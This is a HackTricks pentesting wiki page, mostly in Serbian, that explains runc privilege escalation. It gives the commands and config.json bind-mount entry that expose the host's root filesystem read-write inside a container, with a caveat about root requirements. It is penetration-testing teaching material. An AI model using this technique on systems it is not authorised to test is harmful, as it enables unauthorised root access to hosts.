3.6 KiB
RunC Privilege Escalation
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Osnovne informacije
Ako želite da saznate više o runc, pogledajte sledeću stranicu:
{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} 2375-pentesting-docker.md {% endcontent-ref %}
PE
Ako otkrijete da je runc instaliran na hostu, možda ćete moći da pokrenete kontejner montirajući root / folder hosta.
runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder
Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},
#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs
# Finally, start the container
# The root folder is the one from the host
runc run demo
{% hint style="danger" %}
Ovo neće uvek raditi jer je podrazumevana operacija runc-a da se pokreće kao root, tako da njegovo pokretanje kao korisnika bez privilegija jednostavno ne može funkcionisati (osim ako nemate konfiguraciju bez root-a). Postavljanje konfiguracije bez root-a kao podrazumevane nije generalno dobra ideja jer postoji prilično mnogo ograničenja unutar kontejnera bez root-a koja se ne primenjuju van kontejnera bez root-a.
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.